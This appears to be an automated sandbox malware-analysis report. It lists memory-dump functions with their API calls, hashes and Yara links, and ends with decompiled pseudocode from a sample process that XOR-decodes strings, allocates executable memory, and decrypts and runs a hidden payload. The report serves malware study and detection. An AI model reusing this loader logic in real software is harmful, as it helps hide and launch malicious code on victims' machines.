Function 00007FFC9CFA5870 Relevance: 1.6, APIs: 1, Instructions: 102
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtLoadDriver.NTDLL ref: 00007FFC9CFB678F

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID: DriverLoad
String ID:
API String ID: 2513027847-0
Opcode ID: c43b70abe8334b2419672b8384d424044dd9299ecf4c8d2bb127a2e0486c10bf
Instruction ID: 3d7eda9fb5c23414ea0222a6ab71047da5939bb9d7c059f088ea3e309fc876d4
Opcode Fuzzy Hash: c43b70abe8334b2419672b8384d424044dd9299ecf4c8d2bb127a2e0486c10bf
Instruction Fuzzy Hash: FA31BF71908A1C9FDB58DB589845BB9BBF0FFA5310F10422ED00AD3152EB71A402CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CFAA577 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1221ed9372ad9ea45cd2782bef5525f69f7d665a67bd8d10e0d9a44f2b887fba
Instruction ID: ecfb76959678da697cf5330fcd742fba3e24b9516818f2ba8ed0dff0b9dd5434
Opcode Fuzzy Hash: 1221ed9372ad9ea45cd2782bef5525f69f7d665a67bd8d10e0d9a44f2b887fba
Instruction Fuzzy Hash: 1A22D430A08A1E8FDB69EB2C9455679BBF1EF59300F1401BDE44EC7292EE24A946CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CF9187E Relevance: 1.7, APIs: 1, Instructions: 204
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00007FFC9CF919E1

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a0fa858e661b287586ff2e9e0da6cd6b8c454e8538bddc83f8af0470eb22e80a
Instruction ID: ebd1b1b0edd7b3948912f9a936bee0283e5a4fedf947c7ea08d9d5ce5255be31
Opcode Fuzzy Hash: a0fa858e661b287586ff2e9e0da6cd6b8c454e8538bddc83f8af0470eb22e80a
Instruction Fuzzy Hash: 37518130908A4D4FEB58DF28D8557F97BE1FB59310F00826EE84EC7292DB75A941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CF99770 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a74c52611b940416ae5b3c79770380791b22d8fa6dbf1215f6eae5814341d4c2
Instruction ID: 75ecc38d4172ffdfba8a8465e5c246779fcd84a4bf6359fc490e9afdca71771d
Opcode Fuzzy Hash: a74c52611b940416ae5b3c79770380791b22d8fa6dbf1215f6eae5814341d4c2
Instruction Fuzzy Hash: 9F51E9B290CA594FEF24CA5C68056FDBFF0FB65321B04427BC14D93297EA645906C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CFA5890 Relevance: 1.6, APIs: 1, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbc67b9c994c8e5efd4e6edabf2642efcad1af630a24f5cf57f857edb19bbfc0
Instruction ID: 31b5eb68e68d0c84b32711930247e4a70c16a12b19b7ade75308b858bf220d94
Opcode Fuzzy Hash: fbc67b9c994c8e5efd4e6edabf2642efcad1af630a24f5cf57f857edb19bbfc0
Instruction Fuzzy Hash: 1D41F37190CA5C8FDB28DB5898557BABBF0EB64311F00427FD04AD3292EB74A805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CF9287C Relevance: 1.6, APIs: 1, Instructions: 119
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFC9CF92921

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c3e6d87976a999229c94f25f7a474b20366d7469c48aec21611485efa14c3519
Instruction ID: a9f062cc38a729c437571aee0d206083a5cdd982d4187b73a1c93f79a5d0a7e9
Opcode Fuzzy Hash: c3e6d87976a999229c94f25f7a474b20366d7469c48aec21611485efa14c3519
Instruction Fuzzy Hash: 9C31E43090CA5C8FDB1CDF9898456F9BBF1EBA5721F04422FD04AD3292DB746846CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CF99D44 Relevance: 1.6, APIs: 1, Instructions: 114
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00007FFC9CF99DEE

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c9d397bd994a4b7b9230d7502ceaceb300d910fdafc8da5a89d82131dcdb54d9
Instruction ID: 5c1beb8a02fb0803181f44eae5eff3b3c932945c121b9bd8e2797f54b5a058c9
Opcode Fuzzy Hash: c9d397bd994a4b7b9230d7502ceaceb300d910fdafc8da5a89d82131dcdb54d9
Instruction Fuzzy Hash: 4131B23190CA5D8FDB59DB589849BE9BBF0EB55321F04422BD049D3291DB74A805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CFA58D4 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FFC9CFB61D5

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 219fa86a63b13864419a3970af2b93acd8a9c33f8ed7580e90e214e239d7ca3d
Instruction ID: 40303d9088171a95dd9856328b63ea6e4ae69cdb95630be8665ba18f6acbc1e1
Opcode Fuzzy Hash: 219fa86a63b13864419a3970af2b93acd8a9c33f8ed7580e90e214e239d7ca3d
Instruction Fuzzy Hash: B321D131A08A1C9FDB58DF58D845BF9BBE0FB65321F00422ED04ED3692DB74A956CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CF91CE2 Relevance: 1.4, APIs: 1, Instructions: 131memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FFC9CF91DB7

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 35652da0c87284e049e3909d0c411e23507138f04c155b8f9fc1a34a7a9c1e23
Instruction ID: 23bd0f15452f5efc17147a3bdd1e57b45637ae76fcd4024d190118cb454b48c6
Opcode Fuzzy Hash: 35652da0c87284e049e3909d0c411e23507138f04c155b8f9fc1a34a7a9c1e23
Instruction Fuzzy Hash: AF31283090CA8D8FEB19DB6898466E8BFF0EF56321F14426FD089D31A2DA646456CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D13131A Relevance: 1.1, Instructions: 1079COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2da7f86111681b1326aa87ad119d67e2aebe41be1d36146c8795eabf4fba386b
Instruction ID: b26d3716425ca30081220eaa61080c4dbf800674d52fce33df019ea7bc9ef7ed
Opcode Fuzzy Hash: 2da7f86111681b1326aa87ad119d67e2aebe41be1d36146c8795eabf4fba386b
Instruction Fuzzy Hash: F3629D7380DBDA4FD769DB2888555A4BFE0EF56320F0405FEC0C9CB5A6FA256885C392

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D130000 Relevance: .6, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34530645139a9721727262f3ccdad6a164fac2460c8b2f4077cc2daa18715e49
Instruction ID: 7c173aa4ac233099e39499d69f7e89badc5595946b835c7123a883ecac867682
Opcode Fuzzy Hash: 34530645139a9721727262f3ccdad6a164fac2460c8b2f4077cc2daa18715e49
Instruction Fuzzy Hash: 9812C76280E7DB4FE7669A3489561A57FE0DF53260F0905FAC4C89B5A3FA18184AC362

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D1315E9 Relevance: .4, Instructions: 393COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2024d08011738fbd304ec065682305cc18997bc38cee1682691bd457e994ba45
Instruction ID: d1e6f56acbecd722a121c72873495bd7b85732e3f47c78080cc06972aa928996
Opcode Fuzzy Hash: 2024d08011738fbd304ec065682305cc18997bc38cee1682691bd457e994ba45
Instruction Fuzzy Hash: 28C16B7290CB9A4FD7A9DF18C8559B5FBE1FF56310F0404AED0CACB662FA21A881C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D131B29 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07d917c93c5c4c88b4147b15055a733335aa9b8377b712662fa595030a2381eb
Instruction ID: 40d494487ec33d92050fc4983e284dd81f2f903138fe012937fdf1784d069e9d
Opcode Fuzzy Hash: 07d917c93c5c4c88b4147b15055a733335aa9b8377b712662fa595030a2381eb
Instruction Fuzzy Hash: F4518D3290CB9A4FD759DB18C8559A5FFF1EF96310F0405BEC089C71A6FA26A881C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D132CA8 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69471ac9fdaca757a64e42a9d52e9e13ac8bea4edb7143c8af6daa615812cd14
Instruction ID: 451fd06fb98e4247863fac33bee9c694c2fe2998fcbdb3a6597a6974b3c92e99
Opcode Fuzzy Hash: 69471ac9fdaca757a64e42a9d52e9e13ac8bea4edb7143c8af6daa615812cd14
Instruction Fuzzy Hash: 0111507360CF494FD758EA1C9402575F7E1FF96360F0405AED0CAC7653EA12A802C786

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D130CCC Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286321486e67e98ed0f244aa3dd410f8919d04d49408d8b4c58760c0e714a936
Instruction ID: d678198c542e429f5e7287b128841ee583951cec5e881678b2a53542f54920d9
Opcode Fuzzy Hash: 286321486e67e98ed0f244aa3dd410f8919d04d49408d8b4c58760c0e714a936
Instruction Fuzzy Hash: 69115C7360CA9A4FD758E618E4525F9F7D1FFA5320B0401ADE0CEC7292F915A841C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D130649 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e540faa2362db4a944cae73fd8cbc1c593b43051e475a9d4a0a4be83a8b861b
Instruction ID: b55e249238632def00b948b5578ba8e95b456d19da5646cef2fe4fb27144bbc6
Opcode Fuzzy Hash: 3e540faa2362db4a944cae73fd8cbc1c593b43051e475a9d4a0a4be83a8b861b
Instruction Fuzzy Hash: A5115E6180E3DA4FD713DB748CA26947FF0AF17114B1A41EBC4C88B1A3E728594AC722

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9D1308D3 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.500008230.00007FFC9D130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9D130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9d130000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8c08156184569c48676d21edf4070673ea43973f6eb7c4d47e7148c0b744389
Instruction ID: 077cdcfa17b3ef48cf1fc003e98ec7da20f9ec68e67a573e426d37c969223fc3
Opcode Fuzzy Hash: a8c08156184569c48676d21edf4070673ea43973f6eb7c4d47e7148c0b744389
Instruction Fuzzy Hash: E4D0A723B1DA690AB31C605C7C030F8E3C0C786270354417FE28EC1687EC06788305DA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFC9CF96A17 Relevance: 1.6, Strings: 1, Instructions: 399COMMON

Download Yara Rule

Strings

p, xrefs: 00007FFC9CF96B06

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: 930cba0cb9441915c2df82b2f84331703a6e19c4ddeb75c03792d89c0bc4d98a
Instruction ID: 6815de6d88ea0c67bb70adb7096a14ba0716179ecc2bf6e4866c3e1746376da1
Opcode Fuzzy Hash: 930cba0cb9441915c2df82b2f84331703a6e19c4ddeb75c03792d89c0bc4d98a
Instruction Fuzzy Hash: 27F1F6B591F7C99FE30B9B70986A789BFE09F53259F1C04EDC8C69B1B3E65900098319

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CFA3AF5 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424482d2d35f6732a6a039835d9902c49b5811f644196859a0f77fd8b112e225
Instruction ID: afe18e74b9897aad2f080fad81723001ebbe819cc7e3b527ce811edd36f4429e
Opcode Fuzzy Hash: 424482d2d35f6732a6a039835d9902c49b5811f644196859a0f77fd8b112e225
Instruction Fuzzy Hash: DFE1163160CA5E4FEB69EA2CD4549B57BE1EFA5310B1001BEE04EC72A3EE25EC46C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CF90E58 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab705add81760a0040b51487a808ca518db2daa873214c6c0b856a00b8a6066a
Instruction ID: 37134aaf4c4c7e3081d3516a02ad369483b24b5bf3aac8e337cfa4ae14df5e41
Opcode Fuzzy Hash: ab705add81760a0040b51487a808ca518db2daa873214c6c0b856a00b8a6066a
Instruction Fuzzy Hash: 37B19217F0D1BA56EB11F63DB4B11EAAB509F82334B0400B3D6D9490E3AF0869CED6B5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC9CFA1208 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498651950.00007FFC9CF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC9CF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc9cf90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd1c41aaea35ee1da4a32d0b2da0bd4eeca13296e576653875b659173288c75
Instruction ID: 3de94e3d8d307c69d4e335fdb5c29f4acf22fe9f5a788137398b1a82766072d0
Opcode Fuzzy Hash: 3fd1c41aaea35ee1da4a32d0b2da0bd4eeca13296e576653875b659173288c75
Instruction Fuzzy Hash: 7E611B53A0D7D68BE729E56CB8100E5AFA1DF5223071940FBC185CA4EFB4589889C3A5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: jsc.exePID: 3068, Parent PID: 6988COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	1458
Total number of Limit Nodes:	2

Executed Functions

Function 00403CFC Relevance: 36.2, APIs: 1, Strings: 23, Instructions: 217
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00403CFC(void* __eax, signed int __ebx, signed int __edi, void* __esi) {
				long _t166;
				intOrPtr* _t168;
				intOrPtr* _t169;
				signed int _t172;
				intOrPtr* _t175;
				signed int _t194;
				void* _t196;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed char _t226;
				signed int _t227;
				intOrPtr _t233;
				signed int _t237;
				signed int _t253;
				signed int _t258;
				void* _t261;
				void* _t263;
				signed int _t264;
				void* _t265;

				_t258 = __edi;
				_t223 = __ebx;
				 *((char*)(_t263 - 0x61)) = 0x23;
				 *((char*)(_t263 - 0x60)) = 0x51;
				 *((char*)(_t263 - 0x5f)) = 0x23;
				 *((char*)(_t263 - 0x5e)) = 0x4d;
				 *((char*)(_t263 - 0x5d)) = 0x23;
				_t264 = _t263 + 1;
				asm("movsb");
				_t261 = __esi + 1;
				 *((char*)(_t264 - 0x5b)) = 0x23;
				 *((char*)(_t264 - 0x5a)) = 0x4f;
				 *((char*)(_t264 - 0x59)) = 0x23;
				 *((char*)(_t264 - 0x58)) = 0x10;
				 *((char*)(_t264 - 0x57)) = 0x23;
				 *((char*)(_t264 - 0x56)) = 0x11;
				 *((char*)(_t264 - 0x55)) = 0x23;
				 *((char*)(_t264 - 0x54)) = 0xd;
				 *((char*)(_t264 - 0x53)) = 0x23;
				 *((char*)(_t264 - 0x52)) = 0x47;
				 *((char*)(_t264 - 0x51)) = 0x23;
				 *((char*)(_t264 - 0x50)) = 0x4f;
				 *((char*)(_t264 - 0x4f)) = 0x23;
				 *((char*)(_t264 - 0x4e)) = 0x4f;
				 *((char*)(_t264 - 0x4d)) = 0x23;
				 *((char*)(_t264 - 0x4c)) = 0x23;
				 *((char*)(_t264 - 0x4b)) = 0x23;
				 *(_t264 - 0x68) = 0;
				 *(_t264 - 0x68) = 0;
				while( *(_t264 - 0x68) < 0xd) {
					_t30 =  *(_t264 - 0x68) - 0x34; // 0x75
					 *((char*)(_t264 +  *(_t264 - 0x68) - 0x34)) =  *(_t264 + _t30) ^ 0x00000023;
					asm("int3");
					 *(_t264 - 0x68) =  *(_t264 - 0x68) + 1;
				}
				 *(_t264 - 0x68) = 0;
				while(1) {
					__eflags =  *(_t264 - 0x68) - 0x11;
					if( *(_t264 - 0x68) >= 0x11) {
						break;
					}
					_t40 =  *(_t264 - 0x68) - 0x48; // 0x64
					 *((char*)(_t264 +  *(_t264 - 0x68) - 0x48)) =  *(_t264 + _t40) ^ 0x00000023;
					_t219 =  *(_t264 - 0x68) + 1;
					__eflags = _t219;
					 *(_t264 - 0x68) = _t219;
				}
				 *(_t264 - 0x68) = 0;
				while(1) {
					__eflags =  *(_t264 - 0x68) - 0x1a;
					if( *(_t264 - 0x68) >= 0x1a) {
						break;
					}
					 *(_t264 +  *(_t264 - 0x68) - 0x64) =  *(_t264 +  *(_t264 - 0x68) - 0x64) ^ 0x00000023;
					asm("fisttp qword [ebp-0x17af63bb]");
					_t216 =  *(_t264 - 0x68) + 1;
					__eflags = _t216;
					 *(_t264 - 0x68) = _t216;
				}
				 *(_t264 - 0x74) = E00404187();
				_t56 = _t264 - 0x34; // 0x75
				 *((intOrPtr*)(_t264 - 0x78)) = E004042A7( *(_t264 - 0x74), _t56);
				_t59 = _t264 - 0x48; // 0x64
				_t226 =  *(_t264 - 0x74);
				 *((intOrPtr*)(_t264 - 0x7c)) = E004042A7(_t226, _t59);
				_t166 =  *((intOrPtr*)(_t264 - 8)) +  *((intOrPtr*)(_t264 - 0xc));
				__eflags = _t166;
				 *((intOrPtr*)(_t264 - 0x80)) = VirtualAlloc(0, _t166, 0x1000, 0x40);
				_t168 =  *((intOrPtr*)(_t264 - 0x7c))(0, _t264 - 0x64);
				do {
					__eflags =  *(_t226 - 0x837b) & _t226;
					__eflags =  *(_t258 + _t258 * 8 - 1) & _t258;
					_t258 = _t258 + 1;
					_t265 = _t264 + 1;
					_t169 = _t168;
					 *_t169 =  *_t169 + _t169;
					 *_t169 =  *_t169 + _t169;
					 *((intOrPtr*)(_t265 - 0x70)) =  *((intOrPtr*)(_t265 - 0x80));
					_t172 =  *((intOrPtr*)(_t265 - 0x84)) +  *((intOrPtr*)(_t265 - 4));
					__eflags = _t172;
					 *(_t265 - 0x6c) = _t172;
					while(1) {
						__eflags =  *(_t265 - 0x68) -  *((intOrPtr*)(_t265 - 8)) +  *((intOrPtr*)(_t265 - 0xc));
						if( *(_t265 - 0x68) >=  *((intOrPtr*)(_t265 - 8)) +  *((intOrPtr*)(_t265 - 0xc))) {
							break;
						}
						 *((char*)( *((intOrPtr*)(_t265 - 0x70)) +  *(_t265 - 0x68))) =  *((intOrPtr*)( *(_t265 - 0x6c) +  *(_t265 - 0x68)));
						 *(_t265 - 0x68) =  *(_t265 - 0x68) + 1;
					}
					_t175 =  *((intOrPtr*)(_t265 - 0x80));
					 *((intOrPtr*)(_t265 - 0x88)) = _t175;
					 *(_t265 - 0x68) = 0;
					_t227 =  *(_t265 - 0x68);
					_t264 = _t265 - 1;
					_t168 = _t175;
					__eflags = _t227;
					if(_t227 != 0) {
						goto L22;
					}
					L25:
					 *((intOrPtr*)(_t264 + 0xfffffffffffffe60)) =  *((intOrPtr*)(_t264 - 0x14));
					 *((intOrPtr*)(_t264 + 0xfffffffffffffe64)) =  *((intOrPtr*)(_t264 - 0x10));
					 *((intOrPtr*)(_t264 + 0xfffffffffffffe61)) =  *((intOrPtr*)(_t264 - 0x1c));
					 *((intOrPtr*)(_t264 + 0xbada11)) =  *((intOrPtr*)(_t264 - 0x18));
					_t107 = _t264 - 0x24; // 0xee354079
					 *((intOrPtr*)(_t264 + 0xfffffffffffffe61)) =  *_t107;
					 *((intOrPtr*)(_t264 + 0xbada11)) =  *((intOrPtr*)(_t264 - 0x20));
					_t113 = _t264 - 0x1a0; // 0xe449bebf
					_t114 = _t264 - 0x188; // 0xe449bed7
					E004043B7(_t114, _t113, 0x18);
					_t185 =  *((intOrPtr*)(_t264 - 8)) +  *((intOrPtr*)(_t264 - 0xc));
					__eflags =  *((intOrPtr*)(_t264 - 8)) +  *((intOrPtr*)(_t264 - 0xc));
					E00404497( *((intOrPtr*)(_t264 - 8)) +  *((intOrPtr*)(_t264 - 0xc)), _t264 - 0x188,  *((intOrPtr*)(_t264 - 0x70)), _t185);
					while(1) {
						__eflags =  *(_t264 - 0x68) -  *((intOrPtr*)(_t264 - 8));
						if( *(_t264 - 0x68) >=  *((intOrPtr*)(_t264 - 8))) {
							break;
						}
						_t237 =  *( *((intOrPtr*)(_t264 - 0x88)) +  *(_t264 - 0x68)) ^ 0x00000057;
						_t253 =  *((intOrPtr*)(_t264 - 0x88)) +  *(_t264 - 0x68);
						__eflags = _t253;
						_push(_t264);
						 *_t253 = _t237;
						 *(_t264 - 0x68) =  *(_t264 - 0x68) + 1;
					}
					 *(_t264 - 0x68) = 0;
					while(1) {
						__eflags =  *(_t264 - 0x68) -  *((intOrPtr*)(_t264 - 8));
						if( *(_t264 - 0x68) >=  *((intOrPtr*)(_t264 - 8))) {
							break;
						}
						 *( *((intOrPtr*)(_t264 - 0x88)) +  *(_t264 - 0x68)) =  *( *((intOrPtr*)(_t264 - 0x88)) +  *(_t264 - 0x68)) ^ 0x000000c4;
						 *(_t264 - 0x68) =  *(_t264 - 0x68) + 1;
					}
					 *((intOrPtr*)(_t264 - 0x1a4)) =  *((intOrPtr*)(_t264 - 0x80));
					 *((intOrPtr*)(_t264 - 0x1a8)) =  *((intOrPtr*)(_t264 - 0x80)) +  *((intOrPtr*)(_t264 - 8));
					 *(_t264 - 0x1ac) = _t264;
					__eflags =  *(_t264 - 0x1ac);
					if( *(_t264 - 0x1ac) == 0) {
						__eflags = 0;
						return 0;
					} else {
						_t194 =  *(_t264 - 0x1ac);
						_t233 =  *((intOrPtr*)(_t264 - 0x1a4));
						 *((intOrPtr*)(_t194 + 4)) = _t233;
						_t196 = _t194 - 1 + 0x8b;
						__eflags =  *(_t261 + _t258 * 8 - 1) & _t223;
						 *((intOrPtr*)(_t223 - 0x1a773)) =  *((intOrPtr*)(_t223 - 0x1a773)) - 1;
						_t153 = _t233 - 0x7a74f0b8;
						 *_t153 =  *(_t233 - 0x7a74f0b8) - 1;
						__eflags =  *_t153;
						if (__eflags != 0) goto 0x3e9c6c;
						_t155 = _t223 + 0x4889f44d;
						 *_t155 =  *(_t223 + 0x4889f44d) - 1;
						__eflags =  *_t155;
						_push(ss);
						return _t196;
					}
					L22:
					asm("outsb");
					asm("out dx, eax");
					_t226 = _t227 + _t227;
					__eflags = _t226;
					asm("bound eax, [ebp+0x5d]");
				} while (_t226 > 0);
				_push(_t261);
				asm("pushfd");
				_t93 = _t258;
				_t258 =  *[ds:eax+0x9ce34e4];
				 *[ds:eax+0x9ce34e4] = _t93;
				asm("invalid");
				 *0xb013c9d6 = 0x93;
				asm("lahf");
				asm("jecxz 0x7f");
				asm("aas");
				_t264 = 0xffffffffe449c05f;
				__eflags = 0x513594d4;
				goto L25;
			}

0x00403cfc
0x00403cfc
0x00403cfc
0x00403d00
0x00403d04
0x00403d08
0x00403d0c
0x00403d11
0x00403d12
0x00403d13
0x00403d14
0x00403d18
0x00403d1c
0x00403d20
0x00403d24
0x00403d28
0x00403d2c
0x00403d30
0x00403d34
0x00403d38
0x00403d3c
0x00403d40
0x00403d44
0x00403d48
0x00403d4c
0x00403d50
0x00403d54
0x00403d58
0x00403d5f
0x00403d71
0x00403d7a
0x00403d85
0x00403d88
0x00403d6e
0x00403d6e
0x00403d8b
0x00403d9d
0x00403d9d
0x00403da1
0x00000000
0x00000000
0x00403da6
0x00403db1
0x00403d97
0x00403d97
0x00403d9a
0x00403d9a
0x00403db7
0x00403dc9
0x00403dc9
0x00403dcd
0x00000000
0x00000000
0x00403ddd
0x00403de2
0x00403dc3
0x00403dc3
0x00403dc6
0x00403dc6
0x00403dec
0x00403def
0x00403dfc
0x00403dff
0x00403e03
0x00403e0c
0x00403e19
0x00403e19
0x00403e22
0x00403e27
0x00403e29
0x00403e29
